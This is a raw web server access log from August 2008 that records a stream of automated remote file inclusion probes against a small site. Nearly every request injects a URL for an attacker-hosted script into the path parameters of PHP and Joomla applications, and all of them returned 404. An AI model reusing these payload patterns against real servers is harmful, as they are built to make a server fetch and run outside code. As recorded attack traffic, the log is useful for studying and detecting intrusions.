64.20.53.210 - - [15/Aug/2008:17:02:05 -0700] "GET /logs/access_080719.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
64.207.205.62 - - [15/Aug/2008:17:02:33 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.adoradores.kit.net/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.getyourselfahorse.com"
64.207.205.62 - - [15/Aug/2008:17:02:33 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.adoradores.kit.net/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.getyourselfahorse.com"
83.65.7.74 - - [15/Aug/2008:17:02:54 -0700] "GET /logs/access.log//phphost_directoryv2/include/admin.php?rd=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
83.65.7.74 - - [15/Aug/2008:17:02:54 -0700] "GET //phphost_directoryv2/include/admin.php?rd=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
83.65.7.74 - - [15/Aug/2008:17:02:55 -0700] "GET /logs//phphost_directoryv2/include/admin.php?rd=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
85.14.4.231 - - [15/Aug/2008:17:02:57 -0700] "GET /logs/access.log//phphost_directoryv2/include/admin.php?rd=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
85.14.4.231 - - [15/Aug/2008:17:02:57 -0700] "GET //phphost_directoryv2/include/admin.php?rd=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
85.14.4.231 - - [15/Aug/2008:17:02:57 -0700] "GET /logs//phphost_directoryv2/include/admin.php?rd=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
85.14.4.231 - - [15/Aug/2008:17:03:13 -0700] "GET /logs//phphost_directoryv2/include/admin.php?rd=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
85.14.4.231 - - [15/Aug/2008:17:03:13 -0700] "GET //phphost_directoryv2/include/admin.php?rd=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
62.144.33.204 - - [15/Aug/2008:17:03:14 -0700] "GET /logs//phphost_directoryv2/include/admin.php?rd=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
62.144.33.204 - - [15/Aug/2008:17:03:14 -0700] "GET //phphost_directoryv2/include/admin.php?rd=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
62.144.33.204 - - [15/Aug/2008:17:03:25 -0700] "GET /logs/access.log//phphost_directoryv2/include/admin.php?rd=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
62.144.33.204 - - [15/Aug/2008:17:03:25 -0700] "GET //phphost_directoryv2/include/admin.php?rd=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
62.144.33.204 - - [15/Aug/2008:17:03:26 -0700] "GET /logs//phphost_directoryv2/include/admin.php?rd=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
83.65.7.74 - - [15/Aug/2008:17:03:39 -0700] "GET /logs//phphost_directoryv2/include/admin.php?rd=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
83.65.7.74 - - [15/Aug/2008:17:03:40 -0700] "GET //phphost_directoryv2/include/admin.php?rd=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
151.1.140.201 - - [15/Aug/2008:17:05:03 -0700] "GET /logs/access_080719.log//include/admin.lib.inc.php?site_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
151.1.140.201 - - [15/Aug/2008:17:05:03 -0700] "GET /logs/access_080719.log//include/admin.lib.inc.php?site_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
151.1.140.201 - - [15/Aug/2008:17:05:03 -0700] "GET //include/admin.lib.inc.php?site_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
151.1.140.201 - - [15/Aug/2008:17:05:03 -0700] "GET //include/admin.lib.inc.php?site_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
151.1.140.201 - - [15/Aug/2008:17:05:04 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
151.1.140.201 - - [15/Aug/2008:17:05:04 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
151.1.140.201 - - [15/Aug/2008:17:05:59 -0700] "GET /logs/access_080719.log//include/admin.lib.inc.php?site_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
151.1.140.201 - - [15/Aug/2008:17:05:59 -0700] "GET //include/admin.lib.inc.php?site_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
151.1.140.201 - - [15/Aug/2008:17:05:59 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
77.221.130.6 - - [15/Aug/2008:17:06:25 -0700] "GET /logs/access_080726.log/index.php?option=com_extcalendar&mode=extcal_search%20//index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
66.48.80.144 - - [15/Aug/2008:17:07:16 -0700] "GET /logs/access.log/components/com_forum/download.php?phpbb_root_path=http://www.desperate-souls.com/templates/portax/images/media/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "getyourselfahorse.com"
66.48.80.144 - - [15/Aug/2008:17:07:16 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://www.desperate-souls.com/templates/portax/images/media/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "getyourselfahorse.com"
66.48.80.144 - - [15/Aug/2008:17:07:36 -0700] "GET /logs/access.log/components/com_forum/download.php?phpbb_root_path=http://www.desperate-souls.com/templates/portax/images/media/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "getyourselfahorse.com"
66.48.80.144 - - [15/Aug/2008:17:07:36 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://www.desperate-souls.com/templates/portax/images/media/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "getyourselfahorse.com"
66.48.80.144 - - [15/Aug/2008:17:07:36 -0700] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.desperate-souls.com/templates/portax/images/media/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "getyourselfahorse.com"
84.182.79.6 - - [15/Aug/2008:17:08:08 -0700] "GET /logs/access.log/components/com_forum/download.php?phpbb_root_path=http://www.desperate-souls.com/templates/portax/images/media/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "getyourselfahorse.com"
84.182.79.6 - - [15/Aug/2008:17:08:09 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://www.desperate-souls.com/templates/portax/images/media/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "getyourselfahorse.com"
66.48.80.144 - - [15/Aug/2008:17:08:16 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://www.desperate-souls.com/templates/portax/images/media/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "getyourselfahorse.com"
67.15.186.5 - - [15/Aug/2008:17:09:17 -0700] "GET /logs/access_080719.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.getyourselfahorse.com"
67.15.186.5 - - [15/Aug/2008:17:09:18 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.getyourselfahorse.com"
67.15.186.5 - - [15/Aug/2008:17:09:18 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.getyourselfahorse.com"
84.182.79.6 - - [15/Aug/2008:17:10:08 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://www.desperate-souls.com/templates/portax/images/media/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "getyourselfahorse.com"
67.15.186.5 - - [15/Aug/2008:17:10:40 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.getyourselfahorse.com"
151.1.140.201 - - [15/Aug/2008:17:11:46 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "getyourselfahorse.com"
151.1.140.201 - - [15/Aug/2008:17:11:47 -0700] "GET //include/admin.lib.inc.php?site_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "getyourselfahorse.com"
151.1.140.201 - - [15/Aug/2008:17:11:47 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "getyourselfahorse.com"
151.1.140.201 - - [15/Aug/2008:17:11:47 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "getyourselfahorse.com"
151.1.140.201 - - [15/Aug/2008:17:11:48 -0700] "GET //include/admin.lib.inc.php?site_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "getyourselfahorse.com"
151.1.140.201 - - [15/Aug/2008:17:11:48 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "getyourselfahorse.com"
151.1.140.201 - - [15/Aug/2008:17:12:12 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "getyourselfahorse.com"
151.1.140.201 - - [15/Aug/2008:17:12:12 -0700] "GET //include/admin.lib.inc.php?site_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "getyourselfahorse.com"
151.1.140.201 - - [15/Aug/2008:17:12:13 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "getyourselfahorse.com"
211.202.2.32 - - [15/Aug/2008:17:14:02 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "getyourselfahorse.com"
84.182.79.6 - - [15/Aug/2008:17:14:21 -0700] "GET /logs/access.log/components/com_forum/download.php?phpbb_root_path=http://www.desperate-souls.com/templates/portax/images/media/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "getyourselfahorse.com"
84.182.79.6 - - [15/Aug/2008:17:14:22 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://www.desperate-souls.com/templates/portax/images/media/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "getyourselfahorse.com"
84.182.79.6 - - [15/Aug/2008:17:14:22 -0700] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.desperate-souls.com/templates/portax/images/media/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "getyourselfahorse.com"
217.75.193.70 - - [15/Aug/2008:17:14:56 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://shorttrackwarriors.com//backup/romid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
88.9.19.157 - - [15/Aug/2008:17:18:12 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
74.6.18.245 - - [15/Aug/2008:17:18:12 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "getyourselfahorse.com"
74.6.18.245 - - [15/Aug/2008:17:18:13 -0700] "GET /?N=A HTTP/1.0" 200 899 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "getyourselfahorse.com"
69.94.70.15 - - [15/Aug/2008:17:18:49 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.getyourselfahorse.com"
69.94.70.15 - - [15/Aug/2008:17:18:50 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.getyourselfahorse.com"
69.94.70.15 - - [15/Aug/2008:17:18:50 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.getyourselfahorse.com"
88.9.19.157 - - [15/Aug/2008:17:19:29 -0700] "GET ///vwar/backup/errors.php?error=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
88.9.19.157 - - [15/Aug/2008:17:19:30 -0700] "GET /logs///vwar/backup/errors.php?error=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
88.9.19.157 - - [15/Aug/2008:17:19:31 -0700] "GET /logs/access_080726.log///vwar/backup/errors.php?error=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
69.73.189.205 - - [15/Aug/2008:17:20:21 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/idcaca.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.getyourselfahorse.com"
69.73.189.205 - - [15/Aug/2008:17:20:21 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/idcaca.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.getyourselfahorse.com"
217.75.193.70 - - [15/Aug/2008:17:20:28 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://shorttrackwarriors.com//backup/romid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
217.75.193.70 - - [15/Aug/2008:17:20:28 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://shorttrackwarriors.com//backup/romid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
217.75.193.70 - - [15/Aug/2008:17:20:29 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://shorttrackwarriors.com//backup/romid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
67.222.143.140 - - [15/Aug/2008:17:25:15 -0700] "GET /logs/access_080726.log/phphtml.php?htmlclass_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.getyourselfahorse.com"
67.222.143.140 - - [15/Aug/2008:17:25:16 -0700] "GET /logs/access_080726.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.getyourselfahorse.com"
67.222.143.140 - - [15/Aug/2008:17:25:16 -0700] "GET /phphtml.php?htmlclass_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.getyourselfahorse.com"
67.222.143.140 - - [15/Aug/2008:17:25:16 -0700] "GET /errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.getyourselfahorse.com"
67.222.143.140 - - [15/Aug/2008:17:25:16 -0700] "GET /logs/phphtml.php?htmlclass_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.getyourselfahorse.com"
67.222.143.140 - - [15/Aug/2008:17:25:17 -0700] "GET /logs/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.getyourselfahorse.com"
67.222.143.140 - - [15/Aug/2008:17:25:26 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.getyourselfahorse.com"
67.222.143.140 - - [15/Aug/2008:17:25:27 -0700] "GET /logs/access.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.getyourselfahorse.com"
203.183.129.14 - - [15/Aug/2008:17:29:50 -0700] "GET /logs/access_080719.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
201.130.79.130 - - [15/Aug/2008:17:32:38 -0700] "GET /errors.php?error=http://shorttrackwarriors.com//backup/romid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
217.75.193.70 - - [15/Aug/2008:17:32:47 -0700] "GET /errors.php?error=http://shorttrackwarriors.com//backup/romid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
69.94.70.15 - - [15/Aug/2008:17:33:30 -0700] "GET /logs/access_080719.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.getyourselfahorse.com"
217.75.193.70 - - [15/Aug/2008:17:35:21 -0700] "GET /logs/access_080719.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://shorttrackwarriors.com//backup/romid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
80.70.113.10 - - [15/Aug/2008:17:36:30 -0700] "GET /logs/access.log///admin/classes/TplLoad.php?full_path_to_public_program=http://shorttrackwarriors.com//backup/romid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
80.70.113.10 - - [15/Aug/2008:17:36:33 -0700] "GET ///admin/classes/TplLoad.php?full_path_to_public_program=http://shorttrackwarriors.com//backup/romid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
80.70.113.10 - - [15/Aug/2008:17:36:35 -0700] "GET /logs///admin/classes/TplLoad.php?full_path_to_public_program=http://shorttrackwarriors.com//backup/romid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
202.181.210.195 - - [15/Aug/2008:17:38:57 -0700] "GET /logs/access_080719.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
65.55.105.196 - - [15/Aug/2008:17:39:08 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.getyourselfahorse.com"
65.55.105.196 - - [15/Aug/2008:17:39:08 -0700] "GET /tmp/?D=A HTTP/1.1" 200 520 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.getyourselfahorse.com"
217.25.160.1 - - [15/Aug/2008:17:39:19 -0700] "GET /logs/access.log//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
217.25.160.1 - - [15/Aug/2008:17:39:19 -0700] "GET //oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
217.25.160.1 - - [15/Aug/2008:17:39:19 -0700] "GET /logs//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
217.25.160.1 - - [15/Aug/2008:17:39:20 -0700] "GET /logs/access.log//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
217.25.160.1 - - [15/Aug/2008:17:39:20 -0700] "GET //oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
217.25.160.1 - - [15/Aug/2008:17:39:20 -0700] "GET /logs//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
216.32.72.186 - - [15/Aug/2008:17:41:05 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.abcchurch.com/language/.webmin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
216.32.72.186 - - [15/Aug/2008:17:41:05 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.abcchurch.com/language/.webmin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
216.32.72.186 - - [15/Aug/2008:17:41:05 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.abcchurch.com/language/.webmin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
67.195.37.163 - - [15/Aug/2008:17:45:42 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.getyourselfahorse.com"
67.195.37.163 - - [15/Aug/2008:17:46:19 -0700] "GET / HTTP/1.0" 200 899 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.getyourselfahorse.com"
216.32.72.186 - - [15/Aug/2008:17:47:25 -0700] "GET /logs/access_080719.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.abcchurch.com/language/.webmin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
67.195.37.163 - - [15/Aug/2008:17:49:01 -0700] "GET /?S=A HTTP/1.0" 200 899 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.getyourselfahorse.com"
74.53.70.114 - - [15/Aug/2008:17:53:19 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_rss&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.sonicsr.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.getyourselfahorse.com"
74.53.70.114 - - [15/Aug/2008:17:53:19 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_rss&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.sonicsr.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.getyourselfahorse.com"
74.53.70.114 - - [15/Aug/2008:17:57:13 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_rss&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.sonicsr.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "getyourselfahorse.com"
74.53.70.114 - - [15/Aug/2008:17:57:13 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_rss&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.sonicsr.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "getyourselfahorse.com"
64.20.53.210 - - [15/Aug/2008:17:58:26 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
64.20.53.210 - - [15/Aug/2008:17:58:33 -0700] "GET /logs/access_080726.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
64.20.53.210 - - [15/Aug/2008:17:58:49 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
204.73.96.210 - - [15/Aug/2008:18:03:11 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
204.73.96.210 - - [15/Aug/2008:18:03:11 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
